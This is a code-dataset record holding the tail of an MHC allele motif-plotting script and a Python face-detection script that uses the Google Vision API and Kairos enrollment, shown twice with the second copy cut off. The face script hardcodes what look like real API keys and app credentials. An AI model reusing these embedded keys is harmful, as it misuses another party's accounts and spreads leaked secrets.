(normalized_frequency_matrices.cutoff_fraction == cutoff)
].set_index("position")[AMINO_ACIDS]
if matrix.shape[0] == 0:
return None
matrix = (matrix.T / matrix.sum(1)).T # row normalize
ss_logo = logomaker.Logo(
matrix,
width=.8,
vpad=.05,
fade_probabilities=True,
stack_order='small_on_top',
ax=ax,
)
pyplot.title(
"%s %d-mer (%s)" % (allele, length, models_label), y=0.85)
pyplot.xticks(matrix.index.values)
pyplot.tight_layout()
name = "%s.motifs.%s.png" % (
allele.replace("*", "-").replace(":", "-"), models_label)
filename = os.path.abspath(join(out_dir, name))
pyplot.savefig(filename)
print("Wrote: ", filename)
fig.clear()
pyplot.close(fig)
return name
def write_length_distribution(
length_distributions_df, allele, lengths, cutoff, models_label, out_dir):
length_distribution = length_distributions_df.loc[
(length_distributions_df.allele == allele) &
(length_distributions_df.cutoff_fraction == cutoff)
]
if length_distribution.shape[0] == 0:
return None
length_distribution = length_distribution.set_index(
"length").reindex(lengths).fillna(0.0).reset_index()
fig = pyplot.figure(figsize=(8, 2))
length_distribution.plot(x="length", y="fraction", kind="bar", color="black")
pyplot.title("%s (%s)" % (allele, models_label))
pyplot.xlabel("")
pyplot.xticks(rotation=0)
pyplot.gca().get_legend().remove()
name = "%s.lengths.%s.png" % (
allele.replace("*", "-").replace(":", "-"), models_label)
filename = os.path.abspath(join(out_dir, name))
pyplot.savefig(filename)
print("Wrote: ", filename)
fig.clear()
pyplot.close(fig)
return name
def go(argv):
args = parser.parse_args(argv)
if not exists(args.out_dir):
mkdir(args.out_dir)
predictors = [
("with_mass_spec", args.class1_models_dir_with_ms),
("no_mass_spec", args.class1_models_dir_no_ms),
]
info_per_predictor = OrderedDict()
alleles = set()
for (label, models_dir) in predictors:
if not models_dir:
continue
info_per_predictor[label] = model_info(models_dir)
alleles.update(
info_per_predictor[label]["normalized_frequency_matrices"].allele.unique())
lines = []
def w(*pieces):
lines.extend(pieces)
w('Motifs and length distributions from the pan-allele predictor')
w('=' * 80, "")
w(
"Length distributions and binding motifs were calculated by ranking a "
"large set of random peptides (an equal number of peptides for each "
"length 8-15) by predicted affinity for each allele. "
"For length distribution, the top %g%% of peptides were collected and "
"their length distributions plotted. For sequence motifs, sequence "
"logos for the top %g%% "
"peptides for each length are shown.\n" % (
args.length_cutoff * 100.0,
args.logo_cutoff * 100.0,
))
w(".. contents:: :local:", "")
def image(name):
if name is None:
return ""
return '.. image:: %s\n' % name
alleles = sorted(alleles, key=lambda a: ("HLA" not in a, a))
if args.max_alleles:
alleles = alleles[:args.max_alleles]
for allele in alleles:
w(allele, "-" * 80, "")
for (label, info) in info_per_predictor.items():
length_distribution = info["length_distributions"]
normalized_frequency_matrices = info["normalized_frequency_matrices"]
length_distribution_image_path = write_length_distribution(
length_distributions_df=length_distribution,
allele=allele,
lengths=args.length_distribution_lengths,
cutoff=args.length_cutoff,
out_dir=args.out_dir,
models_label=label)
if not length_distribution_image_path:
continue
w(
"*" + (
"With mass-spec" if label == "with_mass_spec" else "Affinities only")
+ "*\n")
w("Training observations (unique peptides): %d" % (
info['observations_per_allele'].get(allele, 0)))
w("\n")
w(image(length_distribution_image_path))
w(image(write_logo(
normalized_frequency_matrices=normalized_frequency_matrices,
allele=allele,
lengths=args.motif_lengths,
cutoff=args.logo_cutoff,
out_dir=args.out_dir,
models_label=label,
)))
w("")
document_path = join(args.out_dir, "allele_motifs.rst")
with open(document_path, "w") as fd:
for line in lines:
fd.write(line)
fd.write("\n")
print("Wrote", document_path)
if __name__ == "__main__":
go(sys.argv[1:])
| 6,353 | 0 | 92 |
8052c6f74b616a1d0ff9897edcd89cb694062362 | 25,872 | py | Python | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | # face_detector_google3.py
#
# This version expects a source folder containing folders of images,
# as you get with the LFW distribution.
# Each folder is named for one person and that folder should contain
# only photos of that person.
#
# Environment Variable: GOOGLE_APPLICATION_CREDENTIALS
# C:\pyDev\__My Scripts\face_detector_google\Face-Detection-3dc1b370d617.json
from __future__ import print_function
"""Draws squares around faces in the given image."""
import sys
import os
import os.path
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0, parent_dir)
from mcm_lib2 import exception_utils as eu
from mcm_lib2 import fname as fnm
from mcm_lib2 import files_and_folders as ff
from mcm_lib2 import enum as en
import argparse
import base64
import json
import fnmatch
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from PIL import Image
from PIL import ImageDraw
import numpy as np
import kairos_face
kairos_face.settings.app_id = "56aab423"
kairos_face.settings.app_key = "faa3e1412c97b3171dd7dcda3382313a"
RADIUS = 2
API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
def get_list_of_matching_files(root_dir, image_ext_tuple):
'''
Returns a list of filenames in the specified directory that match the specified tuple.
Example tuple: ('*.jpg', '*.jpeg', '*.j2k', '*.png')
'''
x_matching_files = []
# Read the directories in the root_dir and then iterate over them
dirs = os.listdir(root_dir)
for dir in dirs:
full_dir = os.path.join(root_dir, dir)
for root, dirs, files in os.walk(full_dir):
for extension in image_ext_tuple:
for filename in fnmatch.filter(files, extension):
full_filename = os.path.join(full_dir, filename)
x_matching_files.append(full_filename)
return x_matching_files
def save_as_json(d, full_json_filename):
'''
'''
try:
json_string = json.dumps(d, indent=4)
except Exception as e:
return(False, 'Exception in save calling json.dumps. Details: %s' % (str(e)))
try:
with open(full_json_filename, "w") as text_file:
text_file.write("%s" % (json_string))
except Exception as e:
return (False, 'Exception in save() writing to output file: %s. Details: %s' % (full_json_filename, str(e)))
return (True, '')
def get_elipse_bounding_box(x, y, radius):
'''
Returns as a list the bounding box around the specified point
'''
#left = (int(x)-radius, int(y))
#right = (int(x)+radius, int(y))
#top = (int(x), int(y)-radius)
#bottom = (int(x), int(y)+radius)
top_left = (int(x)-radius, int(y)-radius)
bottom_right = (int(x)+radius, int(y)+radius)
#return [left, right, top, bottom]
return [top_left, bottom_right]
# [START get_vision_service]
# [END get_vision_service]
def detect_face(face_file, service, max_results=4):
'''
Uses the Vision API to detect faces in the face_file image
object that was opened by the client with the following:
with open(input_filename, 'rb') as face_file:
detect_face(face_file, 3)
RETURNS: the following tuple (result_flag, err_msg, response_obj, face_data)
'''
# Read the previously-opened image file, base64-encode it and then decode it
image_content = face_file.read()
batch_request = [{
'image': { 'content': base64.b64encode(image_content).decode('utf-8') },
'features': [{ 'type': 'FACE_DETECTION', 'maxResults': max_results }]
}]
#service = get_vision_service()
# Exception details: <HttpError 403 when requesting https://vision.googleapis.com/v1/images:annotate?alt=json
# returned "The request cannot be identified with a client project. Please pass a valid API key with the request.">
#service = discovery.build('vision', 'v1')
#API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
#service = discovery.build('vision', 'v1', developerKey = API_KEY)
try:
request = service.images().annotate(body={ 'requests': batch_request })
except Exceptiion as e:
msg = 'Exception calling annotate service. Details: %s' % (str(e))
return (False, msg, None, None)
try:
response = request.execute()
except Exception as e:
msg = 'Exception calling request.execute. Details: %s' % (str(e))
return (False, msg, None, None)
try:
face_data = None
if 'faceAnnotations' in response['responses'][0].keys():
face_data = response['responses'][0]['faceAnnotations']
except Exception as e:
msg = 'Exception accessing response object for face_data. Details: %s' % (str(e))
return (False, msg, response, None)
return (True, '', response, face_data)
def draw_landmark_boxes(image, xz_landmarks, output_filename):
'''
draws a polygon around each landmark and then save out the file to the specified
output_filename.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
fill='#00ff00'
for z_landmark in xz_landmarks:
x = z_landmark['position']['x']
y = z_landmark['position']['y']
x_bbox = get_elipse_bounding_box(x, y, RADIUS)
draw.ellipse(x_bbox, fill=fill)
im.save(output_filename)
def highlight_faces(image, faces, output_filename):
'''
Draws a polygon around the faces, then saves to output_filename.
Args:
image: a file containing the image with the faces.
faces: a list of faces found in the file. This should be in the format
returned by the Vision API.
output_filename: the name of the image file to be created, where the
faces have polygons drawn around them.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
for face in faces:
box1 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['fdBoundingPoly']['vertices']]
#box2 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['boundingPoly']['vertices']]
draw.line(box1 + [box1[0]], width=3, fill='#00ff00')
#draw.line(box2 + [box2[0]], width=3, fill='#00ff0f')
im.save(output_filename)
def detect_and_annotate(input_filename, face_filename, json_filename, service, max_results):
'''
RETURNS: the following tuple: (result_flag, base_filename, num_faces, headwear_likelihood, msg)
'''
num_faces = 0
base_filename = os.path.basename(input_filename)
tmp_output = os.path.join(os.path.dirname(face_filename),'tmp.jpg')
# First detect the face, then draw a box around it, then save it
with open(input_filename, 'rb') as source_image:
(result, err_msg, response, face_data) = detect_face(source_image, service, max_results)
if not result:
msg = 'Error in detect_and_annotate calling detect_face. Details: %s' % err_msg
return (False, base_filename, 0, msg)
# the call didn't return face data
if not face_data:
msg = 'No face annotation data returned for %s' % (face_filename)
return (False, base_filename, 0, msg)
# The call to detect_face succeeded and we have face_data
num_faces = len(face_data)
#print('Found {} face{}'.format(num_faces, '' if num_faces == 1 else 's'))
#print('Writing face rectangle to file {}'.format(face_filename))
# Reset the file pointer, so we can read the file again to draw the face rectangle
try:
source_image.seek(0)
highlight_faces(source_image, face_data, tmp_output)
except Exception as e:
msg = 'Exception in highlight_faces. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Draw ellipses for the landmarks on the image and save it to a different filename
with open(tmp_output, 'rb') as source_image:
xz_landmarks = face_data[0]['landmarks']
draw_landmark_boxes(tmp_output, xz_landmarks, face_filename)
except Exception as e:
msg = 'Exception in draw_landmark_boxes. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Save the JSON file
(result, errmsg) = save_as_json(response, json_filename)
if not result:
return (False, base_filename, num_faces, errmsg)
except Exception as e:
msg = 'Exception calling save_as_json. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
# Iterate over the list of face_data
xz_face_data = []
for idx in xrange(0, num_faces):
z_face_data = {}
# Pull out headwearLikelihood value from json
headwear_likelihood = face_data[0]['headwearLikelihood']
z_face_data['headwear_likelihood'] = face_data[idx]['headwearLikelihood']
# Pull out eye locations
eye_data = get_eye_locations(face_data, idx)
if len(eye_data) == 2:
try:
d = compute_eye_distance(eye_data)
except Exception as e:
print('Exception calling compute_eye_distance: %s' % (str(e)))
return (False, base_filename, xz_face_data, '')
if d > 0.0:
z_face_data['eye_distance'] = d
else:
z_face_data['eye_distance'] = 0.0
else:
z_face_data['eye_distance'] = 0.0
# Pull out pan angles
try:
z_face_data['face_angles'] = get_face_angles(face_data, idx)
except Exception as e:
print('Exception calling get_face_angles: %s' % (str(e)))
return (False, base_filename, z_face_data, '')
# Add this dictionary to our list
xz_face_data.append(z_face_data)
return (True, base_filename, xz_face_data, '')
def compute_eye_distance(eye_data):
'''
eye_data is a list of two lists
eye_data[0]: [left_eye_x, left_eye_y, left_eye_z]
eye_data[1]: [right_eye_x, right_eye_y, right_eye_z]
'''
left_eye_x, left_eye_y, left_eye_z = eye_data[0]
right_eye_x, right_eye_y, right_eye_z = eye_data[1]
if left_eye_x and right_eye_x:
x = left_eye_x - right_eye_x
x = x * x
else:
return -1.0
if left_eye_y and right_eye_y:
y = left_eye_y - right_eye_y
y = y * y
else:
return -1.0
if left_eye_z and right_eye_z:
z = left_eye_z - right_eye_z
z = z * z
else:
return -1.0
d = np.sqrt(x + y + z)
return d
def select_faces_to_keep(filename, xz_face_data):
'''
xz_face_data is a list of dictionaries.
Each list item is a dictionary with the following key/values:
'eye_distance' : distance (float)
'headwear_likelihood' : likelihood enum (string)
'face_angles' : dictionary with the following keys: 'pan', 'roll', 'pitch'
Using the data we use some simple heuristics to determine which faces to keep.
Rule 1. In an ideal condition, the best face is the one that is relatively much larger than
the runner-up and has a pan angle close to 0.
If both faces are about the same size, then the best face is the one with the pan
angle closest to 0.
'''
x_faces_to_keep = []
x_distances = []
for z in xz_face_data:
d = z['eye_distance']
x_distances.append(d)
# Get the largest face (largest eye distance) and its index in the list
idx_of_largest_face = get_index_of_largest_eye_distance(x_distances)
largest_eye_distance = x_distances[idx_of_largest_face]
z_angles_of_largest_face = xz_face_data[idx_of_largest_face]['face_angles']
pan_angle_of_largest_face = abs(z_angles_of_largest_face['pan'])
# Null out the largest value so we can get runner-up
x_distances[idx_of_largest_face] = 0.0
# Get the runner-up face distance and its index in the list
idx_of_second_largest_eye_distance = get_index_of_largest_eye_distance(x_distances)
second_largest_eye_distance = x_distances[idx_of_second_largest_eye_distance]
z_angles_of_runner_up_face = xz_face_data[idx_of_second_largest_eye_distance]['face_angles']
pan_angle_of_runner_up = abs(z_angles_of_runner_up_face['pan'])
# Calculate the relative difference between these two distances
# This is a float between 0 and 1 in which a larger value indicates a greater relative difference
try:
relative_difference = calculate_relative_difference(largest_eye_distance, second_largest_eye_distance)
except Exception as e:
print('Exception thrown calling calculate_relative_difference. Details: %s' % (str(e)))
return []
rel_face_diff = face_difference(relative_difference)
face_dir_largest = face_direction(pan_angle_of_largest_face)
face_dir_runnerup = face_direction(pan_angle_of_runner_up)
# ---------------------------------------------------------------------------------------------------------------
# Rules for how we deal with other faces detected:
# R0: Large relative difference in face size and forward-facing ==> Only keep largest face
# R1: Medium relative difference in face size, but only largest face is forward-facing ==> Only keep largest face
# R2:
# R3
# Rule R0: If much larger and forward-facing, then only keep the largest face
if (rel_face_diff.name == 'LARGE' or rel_face_diff.name == 'EXTRA_LARGE') and \
face_dir_largest.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R1: If larger, forward-facing face and runner-up is not forward-facing, then keep only largest face
elif rel_face_diff.name == 'MEDIUM' and \
face_dir_largest.d == 'FORWARD' and \
(face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R2: If approx same size faces, largest is forward-facing and runner-up is not forward-facing, keep the face that is forward-facing
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
face_dir_largest.d == 'FORWARD' and \
(face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R3: If approx same size faces, largest is forward-facing and runner-up is forward-facing, keep both faces
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
face_dir_largest.d == 'FORWARD' and face_dir_runnerup.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R4: If approx same size faces and largest face is not forward-facing, runner-up is forward-facing ==> Keep only runner-up face
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
(face_dir_largest.d == 'ANGLED' or face_dir_largest.d == 'SIDE_VIEW') and \
face_dir_runnerup.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
else:
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
return x_faces_to_keep
def get_face_angles(face_data, face_idx):
'''
Using the json face_data returned from the Google Vision detection call,
get the pan, tilt and roll angles of the face and return in a dictionary,
with these values keyed on the angle name.
'''
face_angles = {}
try:
face_angles['pan'] = face_data[face_idx]['panAngle']
face_angles['tilt'] = face_data[face_idx]['tiltAngle']
face_angles['roll'] = face_data[face_idx]['rollAngle']
except Exception as e:
face_angles['pan'] = None
face_angles['tilt'] = None
face_angles['roll'] = None
return face_angles
def get_location_from_landmark_dict(z_lm):
'''
z_lm is the landmark dictionary and z['position'] is the dictionary
holding the coordinate values. It appears that sometimes the Google
service doesn't return a full dictionary.
'''
x = None
if 'x' in z_lm['position'].keys():
x = z_lm['position']['x']
y = None
if 'y' in z_lm['position'].keys():
y = z_lm['position']['y']
z = None
if 'z' in z_lm['position'].keys():
z = z_lm['position']['z']
return [x, y, z]
def get_eye_locations(face_data, face_idx):
'''
Using the json face_data returned from Google Vision detection call,
get the location of the left and right eye for the specified face index.
face_idx:0 is the 0th face detected.
face_idx:1 is the 1st face detected. ...
'''
eye_data = [[], []]
# face_data[idx]['landmarks'] is a list of dictionaries.
# We iterate over the list looking for the one that has the value of LEFT_EYE or
# RIGHT_EYE for the key 'type'.
for lm in face_data[face_idx]['landmarks']:
if lm['type'] == 'LEFT_EYE':
#left_eye_x = lm['position']['x']
#left_eye_y = lm['position']['y']
#left_eye_z = lm['position']['z']
#eye_data[0] = [left_eye_x, left_eye_y, left_eye_z]
[left_eye_x, left_eye_y, left_eye_z] = get_location_from_landmark_dict(lm)
continue
if lm['type'] == 'RIGHT_EYE':
#right_eye_x = lm['position']['x']
#right_eye_y = lm['position']['y']
#right_eye_z = lm['position']['z']
#eye_data[1] = [right_eye_x, right_eye_y, right_eye_z]
[right_eye_x, right_eye_y, right_eye_z] = get_location_from_landmark_dict(lm)
continue
return [[left_eye_x, left_eye_y, left_eye_z], [right_eye_x, right_eye_y, right_eye_z]]
def get_index_of_largest_eye_distance(x_distances):
'''
Returns the index in the x_distances list containing the maximum value.
'''
max_value = max(x_distances)
max_index = x_distances.index(max_value)
return max_index
def calculate_relative_difference(max_distance, runner_up_distance):
'''
Returns the relative difference between the max distance and the runner-up:
Rel_Diff = (max_distance - runner_up) / max_distance
'''
return (max_distance - runner_up_distance) / max_distance
def create_exclude_list(exclude_filename):
'''
Returns a list of filenames in the exclude_filename file.
These are the filenames that should be exluded from processing.
'''
with open(exclude_filename) as f:
x_names = [line.strip() for line in f]
return x_names
if __name__ == '__main__':
# Visual Studio script arguments:
# tst1\00AB500A-0006-0000-0000-000000000000.jpg --out 00AB500A-0006-0000-0000-000000000000_out.jpg --max-results 5
# tst1\demo-image.jpg --out tst1\dog_out.jpg --max-results 3
# tst1\00AB500A-0006-0000-0000-000000000000.jpg --face 00AB500A-0006-0000-0000-000000000000_face.jpg --land 00AB500A-0006-0000-0000-000000000000_land.jpg --max-results 5
# tst1\02ED2000-0006-0000-0000-000000000000.jpg --face 02ED2000-0006-0000-0000-000000000000_face.jpg --land 02ED2000-0006-0000-0000-000000000000_land.jpg --max-results 5
# fd = face_difference(0.30)
# print(fd.name)
print(sys.prefix)
print(sys.version)
print(sys.path)
src_root_dir = r'E:\_Ancestry\lfw\lfw_tmp_efghijk_orig'
out_dir = r'E:\_Ancestry\lfw\lfw_output'
out_suffix = '_face'
#exclude_list_filename = 'exclude1.txt'
#x_exclude = create_exclude_list(exclude_list_filename)
service = discovery.build('vision', 'v1', developerKey = API_KEY)
id = 0
x_files = get_list_of_matching_files(src_root_dir, ('*.jpg', '*.jpeg'))
#for fn in x_files:
# input_face_fni = fni.fname_info(fullname=fn)
# basename =
# output_face_fni = fni.fname_info(dirname=out_dir, basename=input_face_fni.basename, suffix=out_suffix)
# (dir, filename) = os.path.split(fn)
# (basename, ext) = os.path.splitext(filename)
for fn in x_files:
#if fn in x_exclude:
# msg = '%s | %s' % ('Exclude', fn)
# print(msg)
# continue
# Name of the output image file (with the out_suffix)
face_fn = basename + out_suffix + '.jpg'
full_output_face_fn = os.path.join(out_dir, face_fn)
# Name of the output JSON file (.json ext)
json_fn = basename + '.json'
full_output_json_fn = os.path.join(out_dir, json_fn)
try:
(result, base_filename, xz_face_data, errmsg) = detect_and_annotate(fn, full_output_face_fn, full_output_json_fn, service, 3)
except Exception as e:
print('Exception calling detect_and_annotate on: %s, Details: %s' % (filename, str(e)))
continue
if not result:
google_result = 'Failure'
else:
google_result = 'Success'
num_faces = len(xz_face_data)
if num_faces == 1:
try:
(response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
kairos_result = 'Success'
except Exception as e:
msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
face_idx = 0
gender = z_attributes['gender']['type']
age = z_attributes['age']
confidence = z_attributes['confidence']
headwear_likelihood = xz_face_data[0]['headwear_likelihood']
eye_distance = xz_face_data[0]['eye_distance']
pan_angle = xz_face_data[0]['face_angles']['pan']
#pan_angle = xz_face_angles[0]['pan']
#eye_distance = x_distances[0]
msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, str(pan_angle), str(eye_distance), fn, errmsg)
print(msg)
id += 1
# More than 1 face slightly complicates things ...
else:
# We only care about the "extra" face if it meets certain conditions ...
try:
x_faces_to_keep = select_faces_to_keep(base_filename, xz_face_data)
except Exception as e:
print('Exception in select_faces_to_keep on %s. Details: %s' % (base_filename, str(e)))
continue
if False:
# Iterate over the faces we are going to keep...
for face_idx in xrange(0, num_faces):
try:
(response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
kairos_result = 'Success'
except Exception as e:
msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
gender = z_attributes['gender']['type']
age = z_attributes['age']
confidence = z_attributes['confidence']
msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, fn, errmsg)
print(msg)
id += 1
# if num_faces == 1:
# try:
# (response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
# kairos_result = 'Success'
# except Exception as e:
# msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
# gender = z_attributes['gender']['type']
# age = z_attributes['age']
# confidence = z_attributes['confidence']
# else:
# gender = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
# age = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
# confidence = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
#msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, num_faces, headwear_likelihood, gender, age, confidence, fn, errmsg)
#print(msg)
#id += 1
#parser = argparse.ArgumentParser(description='Detects faces in the given image.')
#parser.add_argument('input_image', help='the image you\'d like to detect faces in.')
#parser.add_argument('--face', dest='face_output', default='face.jpg', help='the name of the face output file.')
#parser.add_argument('--land', dest='land_output', default='face.jpg', help='the name of the landmark output file.')
#parser.add_argument('--max-results', dest='max_results', default=4, help='the max results of face detection.')
#args = parser.parse_args()
#main(args.input_image, args.face_output, args.land_output, args.max_results)
print('Done!') | 35.933333 | 219 | 0.681548 | # face_detector_google3.py
#
# This version expects a source folder containing folders of images,
# as you get with the LFW distribution.
# Each folder is named for one person and that folder should contain
# only photos of that person.
#
# Environment Variable: GOOGLE_APPLICATION_CREDENTIALS
# C:\pyDev\__My Scripts\face_detector_google\Face-Detection-3dc1b370d617.json
from __future__ import print_function
"""Draws squares around faces in the given image."""
import sys
import os
import os.path
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0, parent_dir)
from mcm_lib2 import exception_utils as eu
from mcm_lib2 import fname as fnm
from mcm_lib2 import files_and_folders as ff
from mcm_lib2 import enum as en
import argparse
import base64
import json
import fnmatch
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from PIL import Image
from PIL import ImageDraw
import numpy as np
import kairos_face
kairos_face.settings.app_id = "56aab423"
kairos_face.settings.app_key = "faa3e1412c97b3171dd7dcda3382313a"
RADIUS = 2
API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
def get_list_of_matching_files(root_dir, image_ext_tuple):
'''
Returns a list of filenames in the specified directory that match the specified tuple.
Example tuple: ('*.jpg', '*.jpeg', '*.j2k', '*.png')
'''
x_matching_files = []
# Read the directories in the root_dir and then iterate over them
dirs = os.listdir(root_dir)
for dir in dirs:
full_dir = os.path.join(root_dir, dir)
for root, dirs, files in os.walk(full_dir):
for extension in image_ext_tuple:
for filename in fnmatch.filter(files, extension):
full_filename = os.path.join(full_dir, filename)
x_matching_files.append(full_filename)
return x_matching_files
def save_as_json(d, full_json_filename):
'''
'''
try:
json_string = json.dumps(d, indent=4)
except Exception as e:
return(False, 'Exception in save calling json.dumps. Details: %s' % (str(e)))
try:
with open(full_json_filename, "w") as text_file:
text_file.write("%s" % (json_string))
except Exception as e:
return (False, 'Exception in save() writing to output file: %s. Details: %s' % (full_json_filename, str(e)))
return (True, '')
def get_elipse_bounding_box(x, y, radius):
'''
Returns as a list the bounding box around the specified point
'''
#left = (int(x)-radius, int(y))
#right = (int(x)+radius, int(y))
#top = (int(x), int(y)-radius)
#bottom = (int(x), int(y)+radius)
top_left = (int(x)-radius, int(y)-radius)
bottom_right = (int(x)+radius, int(y)+radius)
#return [left, right, top, bottom]
return [top_left, bottom_right]
# [START get_vision_service]
def get_vision_service():
credentials = GoogleCredentials.get_application_default()
return discovery.build('vision', 'v1', credentials=credentials)
# [END get_vision_service]
def detect_face(face_file, service, max_results=4):
'''
Uses the Vision API to detect faces in the face_file image
object that was opened by the client with the following:
with open(input_filename, 'rb') as face_file:
detect_face(face_file, 3)
RETURNS: the following tuple (result_flag, err_msg, response_obj, face_data)
'''
# Read the previously-opened image file, base64-encode it and then decode it
image_content = face_file.read()
batch_request = [{
'image': { 'content': base64.b64encode(image_content).decode('utf-8') },
'features': [{ 'type': 'FACE_DETECTION', 'maxResults': max_results }]
}]
#service = get_vision_service()
# Exception details: <HttpError 403 when requesting https://vision.googleapis.com/v1/images:annotate?alt=json
# returned "The request cannot be identified with a client project. Please pass a valid API key with the request.">
#service = discovery.build('vision', 'v1')
#API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
#service = discovery.build('vision', 'v1', developerKey = API_KEY)
try:
request = service.images().annotate(body={ 'requests': batch_request })
except Exceptiion as e:
msg = 'Exception calling annotate service. Details: %s' % (str(e))
return (False, msg, None, None)
try:
response = request.execute()
except Exception as e:
msg = 'Exception calling request.execute. Details: %s' % (str(e))
return (False, msg, None, None)
try:
face_data = None
if 'faceAnnotations' in response['responses'][0].keys():
face_data = response['responses'][0]['faceAnnotations']
except Exception as e:
msg = 'Exception accessing response object for face_data. Details: %s' % (str(e))
return (False, msg, response, None)
return (True, '', response, face_data)
def draw_landmark_boxes(image, xz_landmarks, output_filename):
'''
draws a polygon around each landmark and then save out the file to the specified
output_filename.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
fill='#00ff00'
for z_landmark in xz_landmarks:
x = z_landmark['position']['x']
y = z_landmark['position']['y']
x_bbox = get_elipse_bounding_box(x, y, RADIUS)
draw.ellipse(x_bbox, fill=fill)
im.save(output_filename)
def highlight_faces(image, faces, output_filename):
'''
Draws a polygon around the faces, then saves to output_filename.
Args:
image: a file containing the image with the faces.
faces: a list of faces found in the file. This should be in the format
returned by the Vision API.
output_filename: the name of the image file to be created, where the
faces have polygons drawn around them.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
for face in faces:
box1 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['fdBoundingPoly']['vertices']]
#box2 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['boundingPoly']['vertices']]
draw.line(box1 + [box1[0]], width=3, fill='#00ff00')
#draw.line(box2 + [box2[0]], width=3, fill='#00ff0f')
im.save(output_filename)
def detect_and_annotate(input_filename, face_filename, json_filename, service, max_results):
'''
RETURNS: the following tuple: (result_flag, base_filename, num_faces, headwear_likelihood, msg)
'''
num_faces = 0
base_filename = os.path.basename(input_filename)
tmp_output = os.path.join(os.path.dirname(face_filename),'tmp.jpg')
# First detect the face, then draw a box around it, then save it
with open(input_filename, 'rb') as source_image:
(result, err_msg, response, face_data) = detect_face(source_image, service, max_results)
if not result:
msg = 'Error in detect_and_annotate calling detect_face. Details: %s' % err_msg
return (False, base_filename, 0, msg)
# the call didn't return face data
if not face_data:
msg = 'No face annotation data returned for %s' % (face_filename)
return (False, base_filename, 0, msg)
# The call to detect_face succeeded and we have face_data
num_faces = len(face_data)
#print('Found {} face{}'.format(num_faces, '' if num_faces == 1 else 's'))
#print('Writing face rectangle to file {}'.format(face_filename))
# Reset the file pointer, so we can read the file again to draw the face rectangle
try:
source_image.seek(0)
highlight_faces(source_image, face_data, tmp_output)
except Exception as e:
msg = 'Exception in highlight_faces. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Draw ellipses for the landmarks on the image and save it to a different filename
